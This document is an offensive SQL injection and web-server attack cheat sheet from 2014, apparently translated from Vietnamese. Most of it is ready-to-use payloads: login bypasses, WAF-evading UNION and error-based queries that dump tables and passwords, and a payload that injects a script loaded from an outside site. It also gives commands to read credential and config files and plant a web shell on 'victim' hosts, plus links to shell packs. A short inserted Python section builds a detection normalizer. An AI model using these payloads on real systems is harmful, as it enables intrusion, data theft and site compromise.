April 25, 2014

A collection of commands for checking SQLi

+++Bypass login ADMIN :
Username:user ' or 1=1# /admin' or '1'='1/ 1'or'1'='1
Password:pass ' or 1=1# /1'or'1'='1
++Find the hex code of a table name

Hex-encode a table name ~~~> http://www.convertstring.com/EncodeDecode/HexEncode
Encode ~~~>Encode http://www.base64encode.org/
Decode ~~~>Decode http://www.base64decode.org/

++My Sql Injection:http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
++SQLi collection: http://sla.ckers.org/forum/list.php?16
++Collection of SQL tutorials of all kinds: http://khotien.com/diendan/default.aspx?g=posts&t=1759
++SQLi tutorial for ASPX: http://root.vn/threads/sqli-khai-thac-doi-voi-aspx.2843/
++SQLi tutorials, various types: http://tutsql.blogspot.com/
++Types of bypass: http://hack2play.blogspot.com/2013/03/waf-bypass-sql-injection-tips.html
++SQLi tutorial, easy to hard: http://nh0ksad.blogspot.com/2013/11/tu-de-en-kho-bypass-waf.html
++Basic SQL hacking tutorial
http://sinhvienit.net/forum/tut-hack-sqli-injection-can-ban-cho-newbie-d.247389.html (if id=null does not work, use id=-...)
++SQL exploitation with bypass:
http://kechocgian.blogspot.com/2013/02/mot-so-cach-bypass-sql-injection.html
++SQL exploitation: filter bypass + 403 Forbidden
http://kechocgian.blogspot.com/2012/10/size6fontarial-blackcolorredtut-by-ke.html
++Error-based/double query tutorial: https://top-hat-sec.com/forum/index.php?topic=2061.0
++Local attack techniques: http://ceh.vn/@4rum/showthread.php?tid=3031
++Microsoft OLE DB tutorial: http://root.vn/threads/huong-dan-hack-database-qua-sql-injection.2773/
---------------------------------------------------------------------
**************Java variant:
***id=-123 UNION SELECT 1,2,concat((0x3c736372697074207372633d22687474703a2f2f6c616e6774756b6964732e636f6d2f73716c692e6a73223e3c2f7363726970743e))langtukids,4-- -
***id=-123'+/*!50000union+select*/ 1,2,concat/*!((0x3c736372697074207372633d22687474703a2f2f6c616e6774756b6964732e636f6d2f73716c692e6a73223e3c2f7363726970743e))*/,4-- -
------------------------------------
***Basic "and=0" variant:
**Vulnerable column: id=123 and=0 UNION SELECT 1,2-- -
Get table, column and data as usual, adding "and=0" after the id.
---------------------------------------------------------------------------
Check order :+/*!12345PROCEDURE*/+ANALYSE()-- -
-------------------------------------------------------------------
************Nested variant + ordinary bypass:
***Order: id=-1' uniounion SELECT 1,2,3-- -
***Get table: id=-1' uniounion SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
***Get column:id=-1' uniounion SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name=0x...-- -
***Get Data: id=-1' uniounion SELECT 1,group_concat(<column>,0x207c20,<column>,0x207c20),3 from <table> -- -
---------------------------------------------------------------
***********/*!Union*/ /*!Select*/ variant:
**Find the vulnerable column: link victim+null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- -
**Get database :link victim+ /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!table_name*/) from information_schema./*!tables*/ where table_schema=database()-- -
**Get Column:link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column_name*/) 4,5... from information_schema./*!columns*/ where /*!table_name*/=0x+<hex of table name>-- -
**Get data :link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!<column>,0x7c,<column>,0x7c,<column>,0x7c*/) from <table>-- -
-----------------------------------------------------------------
**********Advanced bypass, /*!Union*/ /*!Select*/ variant, hidden type:
***Vulnerable column: id=-... /*!Union*/ /*!Select*/ 1,2,3...-- -
***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column_name*/))),3 from information_schema./*!columns*/ where /*!table_name*/=0x...()-- -
***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!<column>,0x7c,<column>,0x7c*/))),3 from table -- -
----------------------------------------------------------------
***************Bypass variant when "=" is blocked + hidden:
***Vulnerable column: id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- -
***Get database:id=-..../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4 from information_schema. /*!50000tables*/ where /*!50000table_schema*/+like+database()-- -
***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column_name*/))),4 from information_schema. /*!50000columns*/ where /*!50000table_name*/+like+0x...()-- -
***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000<column>,0x7c,<column>,0x7c*/))),4 from table-- -
-----------------------------------------------------------------------
-----------------------------------------------------------------
********************403 bypass variant with limit ***(hard)
+++Vulnerable column: id=-1'+/*!50000union+select*/+1,2,3,4 -- -
+++Get table:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,table_name)+from+information_schema.tables+where+table_schema=database()+limit+1,1-- - (to get more tables, increase the limit: 1,1 - 2,1 - 3,1...)
+++Get column:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,column_name)+from+information_schema.columns+where+table_name=0x...+limit+1,1-- - (increase the limit)
+++Get data :id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,<column>,<column>)+from+<table> -- -
--------------------------------------------------------------------------------------------
----------------------------------403 bypass with limit ****(extremely hard)*****
***Find the vulnerable column: id=-1+/*!50000union+select*/+1,2,3-- -
***Get table:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,table_name))*/)+from+/*!information_schema*/.tables+where+table_schema=database()+limit+0,1-- -
***Get column:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,column_name))*/)+from+/*!information_schema*/.columns+where+table_name=0x...+limit+0,1-- -
***Get data:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,<column>,<column>))*/)+from+<table>-- -
-------------------------------------------------------------------------
-----------------------403 bypass variant (/*!00000UNION+SELECT*/)
***Vulnerable column: id=-1'+/*!00000UNION+SELECT*/+1,2,3-- -
***Get Table :id=-1'+/*!00000UNION+SELECT*/+1,/*!00000group_cOncat(unhex(hex(table_name)))*/,3+/*!from*/+information_schema.tables+where+table_schema=database()-- -
***Get Column:id=-1'+/*!00000UNION+SELECT*/+1,/*!00000group_cOncat(unhex(hex(column_name)))*/,3+/*!from*/+information_schema.columns+where+table_name=0x...-- -
***Get Data:id=-1'+/*!00000UNION+SELECT*/+1,/*!00000group_cOncat(unhex(hex(<column>,0x7c,<column>,0x7c)))*/,3+from+<table>-- -
-------------------------------------------------------------------------------------
*****************Variant where () is blocked ~~~> extremely hard.
***Vulnerable column: UNION SELECT 1,2,3,4,5,6,7-- - (@@version)
***Get table:UNION SELECT 1,table_schema,3,4,5,6,7 from information_schema.tables where table_schema<>'information_schema' LIMIT 0,1-- - (increase the limit)
***Get column :UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='<table>' and table_name=0x... LIMIT 0,1-- - (increase the limit)
***Get Data :UNION SELECT 1,<column>,<column>,3,4,5,6,7 from <table>-- -
-------------------------------------------------------------------------------------------
***********************Bypass %0AUNION%0ASELECT :
***Vulnerable column: id=-1'+%0AUNION%0ASELECT+1,2-- -
***Table:id=-1'+%0AUNION%0ASELECT+1,table_name+from+information_schema.tables
***Column:id=-1'+%0AUNION%0ASELECT+1,colum_name+from+information_schema.columns+where+table_name=0x....-- -
***Info Columns:id=-1'+%0AUNION%0ASELECT+1,<column>+from+<table>-- -
--------------------------------------------------------------------------
****************String-500 error variant (exploiting an MSSQL DB, same as ASPX)
***Vulnerable column: id=-1' '1','2','3'-- -
***Get table:id=-1' '1',(select top 1 table_name from information_Schema.tables),'3'-- - **Get next table: (select top 1 table_name from information_Schema.tables where table_name not in ('<table 1>'))**
***Get Column:id=-1' '1',(select top 1 column_name from information_schema.columns where table_name=('<table>'))),'3'-- - **Get next column: (select top 1 column_name from information_Schema.columns where table_name='<table>' and column_name not in ('<column 1>'))
***Get Data:id=-1' '1',select top 1 <column>%2b'|'%2b <column> from <table>),'3'-- -

------------------------------------------------------------------------------------
****************Combined 403 and 406 bypass variant:
***Vulnerable column: id=-1+/*!20000%0d%0aunion*/+/*!20000%0d%0aselect*/+1,2,3-- -
*****************Hidden get-data variant:
***group_concat(unhex(hex(<column>)),0x7c,unhex(hex(<column>)),0x7c,unhex(hex(<column>)))+from+<table>-- -
-------------------------------------------------------------------------
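
Added example (not from the original post), written for the filtering side: the variants above pass keyword filters because MySQL executes the body of a `/*!...*/` comment and the server URL-decodes `%0A` and `+` before the query is built. The sketch below normalizes a query string the same way before matching; the signature names and the sample requests are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*!NNNNN ... */, so unwrap it instead of dropping it.
VERSIONED = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SIGNATURES = {  # hypothetical rule names
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    "xpath-error": re.compile(r"\b(extractvalue|updatexml)\s*\("),
}

# Constructed sample query strings; the first three follow shapes on this page.
SAMPLES = [
    "id=-1+/*!50000union+select*/+1,2,3--+-",
    "id=-1'+%0AUNION%0ASELECT+1,2--+-",
    "id=-1+/*!00000UNION+SELECT*/+1,2+/*!from*/+information_schema./*!tables*/",
    "q=credit+union+hours&page=2",
]

def normalize(raw):
    text = unquote_plus(raw)            # %0A -> newline, + -> space
    prev = None
    while prev != text:                 # unwrap versioned comments until stable
        prev = text
        text = VERSIONED.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)  # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", text).lower()

def classify(raw):
    norm = normalize(raw)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))

def naive(raw):
    # What a plain keyword match on the raw request sees.
    return "union select" in raw.lower()

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive(s)!s:5} normalized={classify(s)}  {s}")
```

Pattern matching like this is a detection aid for logs and WAF rules; the fix for the injectable parameter itself is still a bound query.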
****Hard filter bypass (1 column or many columns)
***Get table :id=-1 Union Select group_concat(table_name) FrOm infOrMation_schema.tables
***Get Column :id=-1 Union Select group_concat(column_name) FrOm infOrMation_schema.tables where table_name=0x...-- -
Get Data:id=-1 Union Select group_concat(<column>,0x7c,<column>,0x7c) FrOm <table>-- -
*************Basic: get tables one at a time:
***id=-1 UNION SELECT 1,table_name,3 from information_schema.tables limit 0,1-- - (increase the limit to get the next table)

------------------------------------------------------------------------
*******************When id=-1 order by ....-- - does not find the vulnerable column, change it to id=1' order by ...-- - and then exploit as usual.
~~~>If the tables cannot be retrieved, use id=-1' .... and then exploit as usual.
***************Hidden table variant (UnIoN SeLeCT):
**Vulnerable column: id=-... UNION SELECT 1,2,3,...-- -
**Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (put database() in the vulnerable column).
**Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(table_name))),3,4,... from information_schema.tables where table_schema=database()-- - (add unhex(hex if the table is hidden)
**Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,... from information_schema.columns where table_name=0x<hex of table name>-- -
**Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(<column>,0x7c,<column>,0x7c,<column>))),4,5,6,7,8,9,10,11,12,13 from <table>-- -
----------------------------------------------------
--------------------------------------------------
Querying tables by first letter, last letter, or a substring, for error-based + XPath:
======> and extractvalue(rand(),concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name like 'u%')))-- - (first letter is u)
======>and extractvalue(rand(),concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name like '%u')))-- - (last letter is u)
======>and extractvalue(rand(),concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name like '%user%')))-- - (substring)
--------------------------------------------------
********************Error-based bypass variant:
1./*!and(select 1 from(select count(*),concat((select concat(0x7c,version())),floor(rand(0)*2))a from information_schema.columns group by a)d)*/
2./*!And(Select 1 From(Select Count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/ ~~~> Increase the limit to get more tables.
3./*!And(Select 1 From(Select Count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name=0x... limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/
4./*!And(Select 1 From(Select Count(*),Concat((select concat(0x7c,<column>,0x7c,<column>) from <table> limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/
----------------------------------------------------------
****************XPath Injection (error-based):
1.and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))-- -
2.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))-- -
3.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns where table_name=0x"table" limit 0,1)))-- -
4.and extractvalue(rand(),concat(0x7c,(select concat("column",0x7c,"column") from "table" limit 0,1)))-- -
-------------------------------------------
***XPath bypass variant (hard)
1.' and extractvalue(rand(),concat/*!(0x7c,version(),0x7c,database(),0x7c,user())*/)-- -
2.' and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,table_name) from /*!information_schema*/.tables where table_schema=database() limit 0,1)))-- -
3.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,column_name) from /*!information_schema*/.columns where table_name=0x"table" limit 0,1)))-- -
4.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!("column",0x7c,"column") from "table" limit 0,1))*/)-- -
-----------------------------------------
*****************XPath Injection (advanced error-based)
1.or 1 group by concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) having min(1) or 1-- - /and updatexml(0,concat(0x7c,version(),0x7c,database(),0x7c,user()),0)-- -
2.and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
3.and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x... limit 0,1)),0)-- -
4.and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from <table> limit 0,1)),0)-- -
---------------------------------------------
++SQL exploitation via error-based techniques, all kinds:
http://ku96.blogspot.com/2012/07/mot-so-luu-y-khi-khai-thac-sql.html
http://demo-tainguyen.blogspot.com/2012/05/khai-thac-error-based-quick-blind.html
++Blind SQL exploitation:
http://ceh.vn/@4rum/showthread.php?tid=1203

++less /etc/passwd
less =cat =more.

Shell pack: http://www.mediafire.com/download/c42t1hz2954928v/shell.rar
Find a site's admin link
http://root.vn/threads/admin-finder-phan-mem-tim-link-admin-hieu-qua.3400/

++++++++++++++++++Tut LOCAL ATTACK:
http://www.mediafire.com/folder/8lya2k7axwi2y/tutorial
-------------------------BUG JOOMLA 1.5(COM_USER)
+++Tool: Firebug.
+++Path:domains/index.php?option=com_user&view=reset&layout=confirm -http://logigear.vn/index.php?option=com_user&view=register
+++Link:http://www.youtube.com/watch?v=kiVfu88mpDA
+++Edit :<input name="jform[groups][]" value="7" />
--------------------------LOCAL ATTACK------------------------------
+++++Local attack guide: http://ceh.vn/@4rum/showthread.php?tid=3031
+++Basic get-root tutorial: http://tutlocal.blogspot.com/2013/06/tut-get-root-can-ban.html & http://www.mediafire.com/download/utyfyjcad47h58y/tut-localroot.rar
+++Commands to view users on DirectAdmin:
*cd /etc~~~>cat passwd
*less /etc/virtual/domainowners
+++View the exact user when cPanel is in use:
ls -la /etc/valiases/domain.com
+++View chmod :ls -la /path
+++Command to view the Joomla server config:
*less /user/domains/victim.com/public_html/configuration.php (path varies)
+++SSI shell syntax:
Ip/~user/path (after public_html)
++Command to copy a shell:
cp path shell /home/user victim/public_html/1.php
--------------Pass MD5+SALT:
+++"1ead0efb9e47a371c301afbea8f57274:HmkI9oJSb8qdKzTXwfzJjdKwLSbUZDnZ" = 123456
+++WP :$P$B7u/NYhVtuYh/cBLFwjpMmeyImMaRb.=123456
+++VBB :MD5:bfffa5fdecdaff2ba90ce80234740db5
salt: <QU0OQ*_?^o"#.W>,S@`qpEYvu25l) =123456
-------------------------------Security---------------------
+++Defending against local attacks: chmod folders to 501 and the config file to 400.
-------------------------------SEO---------------------
+++Check pr :http://www.thuvienseo.net/seotools/checkpagerank/
